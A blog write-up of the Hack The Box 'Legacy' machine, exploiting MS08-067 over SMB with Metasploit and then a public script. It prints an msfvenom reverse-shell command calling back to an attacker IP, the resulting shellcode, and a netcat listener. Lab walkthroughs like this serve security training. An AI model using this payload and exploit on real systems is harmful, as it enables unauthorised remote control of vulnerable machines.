Synoslabs

Nous contacter

💻 Legacy – Writeup

adm_synoslabs

Reading Time: 4 minutes

, , , , , ,

We’ll use a very famous CVE vulnerability to exploit this machine.

Add the IP address in /etc/hosts:

...
10.10.10.4     legacy.htb
...

First run a nmap scan:

Only 2 ports seem interesting: 139 and 445 which are SMB ports.

We can run some enumeration on them:

We got some data but nothing really useful.
smbclientdoesn’t return anything when we want to list shares.

The only thing remaining is the OS version which seems to be Windows XP that is a very old version.
It should have an exploit related to it:

MS08-067 is a good candidate and is directly integrated to metasploit. Let’s try it:

Observe the options to know what to set:

Run the exploit:

We are now Administrator of the machine!

Here the other solution to hack the box (:p) without metasploit.

We must download the script from https://github.com/andyacer/ms08_067
Then generate a shellcode depending on our IP address and the port we want to listen the callback on:

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.6 LPORT=1337 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f c -a x86 --platform windows

The only fields you must change here is the LHOST and LPORT variables.
It’ll generate an output similar t this:

unsigned char buf[] = 
"\x29\xc9\x83\xe9\xaf\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e"
"\x43\xec\x69\xf7\x83\xee\xfc\xe2\xf4\xbf\x04\xeb\xf7\x43\xec"
"\x09\x7e\xa6\xdd\xa9\x93\xc8\xbc\x59\x7c\x11\xe0\xe2\xa5\x57"
"\x67\x1b\xdf\x4c\x5b\x23\xd1\x72\x13\xc5\xcb\x22\x90\x6b\xdb"
"\x63\x2d\xa6\xfa\x42\x2b\x8b\x05\x11\xbb\xe2\xa5\x53\x67\x23"
"\xcb\xc8\xa0\x78\x8f\xa0\xa4\x68\x26\x12\x67\x30\xd7\x42\x3f"
"\xe2\xbe\x5b\x0f\x53\xbe\xc8\xd8\xe2\xf6\x95\xdd\x96\x5b\x82"
"\x23\x64\xf6\x84\xd4\x89\x82\xb5\xef\x14\x0f\x78\x91\x4d\x82"
"\xa7\xb4\xe2\xaf\x67\xed\xba\x91\xc8\xe0\x22\x7c\x1b\xf0\x68"
"\x24\xc8\xe8\xe2\xf6\x93\x65\x2d\xd3\x67\xb7\x32\x96\x1a\xb6"
"\x38\x08\xa3\xb3\x36\xad\xc8\xfe\x82\x7a\x1e\x84\x5a\xc5\x43"
"\xec\x01\x80\x30\xde\x36\xa3\x2b\xa0\x1e\xd1\x44\x13\xbc\x4f"
"\xd3\xed\x69\xf7\x6a\x28\x3d\xa7\x2b\xc5\xe9\x9c\x43\x13\xbc"
"\xa7\x13\xbc\x39\xb7\x13\xac\x39\x9f\xa9\xe3\xb6\x17\xbc\x39"
"\xfe\x9d\x46\x84\x63\xfd\x4d\xea\x01\xf5\x43\xe9\x50\x7e\xa5"
"\x86\x79\xa1\x14\x84\xf0\x52\x37\x8d\x96\x22\xc6\x2c\x1d\xfb"
"\xbc\xa2\x61\x82\xaf\x84\x99\x42\xe1\xba\x96\x22\x2b\x8f\x04"
"\x93\x43\x65\x8a\xa0\x14\xbb\x58\x01\x29\xfe\x30\xa1\xa1\x11"
"\x0f\x30\x07\xc8\x55\xf6\x42\x61\x2d\xd3\x53\x2a\x69\xb3\x17"
"\xbc\x3f\xa1\x15\xaa\x3f\xb9\x15\xba\x3a\xa1\x2b\x95\xa5\xc8"
"\xc5\x13\xbc\x7e\xa3\xa2\x3f\xb1\xbc\xdc\x01\xff\xc4\xf1\x09"
"\x08\x96\x57\x89\xea\x69\xe6\x01\x51\xd6\x51\xf4\x08\x96\xd0"
"\x6f\x8b\x49\x6c\x92\x17\x36\xe9\xd2\xb0\x50\x9e\x06\x9d\x43"
"\xbf\x96\x22";

Only take the strings, open the file ms08_067_2018.py and replace the payload line 44 by the one we just generated:

Setup a listener using netcat to catch the reverse shell:

nc -lnvp 1337

Don’t forget to modify the port depending on what you defined with msfvenom before.

We can now run the exploit:

  • 10.10.10.4: this is the target
  • 6: tells the script to execute the exploit for a Windows XP SP3 English. You can try the other ones. But if it fails, you must restart the box because it brokes the SMB service.
  • 445: SMB port to target

We got our shell and we can retrieve the user and administrator flags!

Leave a Reply

Your email address will not be published. Required fields are marked *